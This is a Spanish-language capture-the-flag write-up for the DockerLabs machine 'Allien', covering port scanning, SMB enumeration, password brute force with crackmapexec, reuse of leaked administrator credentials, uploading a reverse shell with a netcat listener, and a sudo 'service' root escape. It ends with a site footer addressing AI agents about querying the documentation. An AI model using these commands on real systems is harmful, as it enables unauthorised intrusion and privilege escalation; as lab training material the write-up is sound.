# Allien

### 🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 172.17.0.2
```

para verificar la conectividad de red.

<figure><img src="/files/mPYNd55f6Ycq4oFBBUpJ" alt=""><figcaption></figcaption></figure>

A continuación, realizamos el comando:

```bash
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="/files/V5cn1aMK5tcXFTrPp0GR" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH,** el **puerto 80** perteneciente al **servicio HTTP,** el **puerto 139** perteneciente al **servicio NetBIOS**  y el **puerto 445** perteneciente al **servicio SMB** están abiertos por lo que a continuación se indagará más.&#x20;

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80,139,445 -v 172.17.0.2
```

para obtener más información sobre esos puertos específicamente.

<figure><img src="/files/ZLZSbJYZr1KajtpWF9Et" alt=""><figcaption></figcaption></figure>

Seguimos indagando más sobre los puertos y ahora indagamos sobre el **servicio HTTP**. Se ingresó la **dirección IP** en el navegador lo que llevó a que la página web sea una página sobre un panel de Login.

<figure><img src="/files/3g0kpDejoorqr1QkFadX" alt=""><figcaption></figcaption></figure>

Ahora buscaremos directorios y archivos con la herramienta **Gobuster** a través de:

```bash
gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml
```

<figure><img src="/files/hSWQsGQGRU2ZCJbROwAp" alt=""><figcaption></figcaption></figure>

Revisamos los archivos pero no encontramos nada relevante.

Vamos a descubrir usuarios y carpetas compartidas válidos para **SMB**.

```bash
enum4linux 172.17.0.2
```

<figure><img src="/files/jecp790u9kPq6DBOsWIn" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/UwEG4Eb34VTMuuSoe6Gy" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Descubrimos varios usuarios por lo que realizamos fuerza bruta con **crackmapexec** pero solo con **satriani7** tenemos resultado.

```bash
crackmapexec smb 172.17.0.2 -u satriani7  -p /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/ZkF25KOReJVcVyGfQzpQ" alt=""><figcaption></figcaption></figure>

Tenemos las credenciales por lo que vamos a enumerar los recursos compartidos del usuario.

```bash
smbmap -u satriani7 -p 50cent -H 172.17.0.2
```

<figure><img src="/files/Y6BHmgzp9w6pBAcGSQzY" alt=""><figcaption></figcaption></figure>

Vemos a ver el contenido de esas carpetas.

```bash
smbclient //172.17.0.2/myshare -U 'satriani7'
smbclient //172.17.0.2/backup24 -U 'satriani7'
```

<figure><img src="/files/xgzl2cIvKZrK74VoIBE3" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/3GivL7gRUCVdeCQLzmuY" alt=""><figcaption></figcaption></figure>

Nos descargamos el contenido para visualizarlo.

<figure><img src="/files/A6xdW6Zp3NJkuzQ7edA1" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/iYSNKEoipebWDaUmKsrr" alt=""><figcaption></figcaption></figure>

Como vemos nos dice que tenemos las credenciales de varios usuarios incluyendo la del **administrador** pues nos logueamos pero con ese usuario.

```bash
smbmap -u 'administrador' -p 'Adm1nP4ss2024' -H 172.17.0.2
```

<figure><img src="/files/aIA8K2hPM601gSHBmqhw" alt=""><figcaption></figcaption></figure>

Tenemos permisos en la carpeta `/home` pues vamos a ver que contiene.

```bash
smbclient //172.17.0.2/home -U 'administrador'
```

<figure><img src="/files/UCawxwZ5zFGKSXTMGz6s" alt=""><figcaption></figcaption></figure>

Vemos que es el mismo contenido de la página por lo que subimos una [Reverse Shell](https://www.revshells.com/).

<figure><img src="/files/IoT5YO18sRORJ0VG00jG" alt=""><figcaption></figcaption></figure>

Nos ponemos en escucha.

```bash
nc -nlvp 443
```

<figure><img src="/files/ivpGgDiFpc4uK4H4MhwB" alt=""><figcaption></figcaption></figure>

Hacemos el [tratamiento de la TTY](https://invertebr4do.github.io/tratamiento-de-tty/#) para trabajar más cómodos.

### 🔐 **PRIVILEGIOS**

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar.&#x20;

<figure><img src="/files/lvPsWZHBuZ4G9Kw42Brp" alt=""><figcaption></figcaption></figure>

Nos llama la atención **service** por lo que buscamos en esta [página ](https://gtfobins.github.io/gtfobins/sed/)cómo explotarlo.

```bash
sudo /usr/sbin/service ../../bin/sh
```

<figure><img src="/files/ksfvoGCSJ6GMbZnfDOWt" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://beafn28.gitbook.io/beafn28/writeups/dockerlabs/allien.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.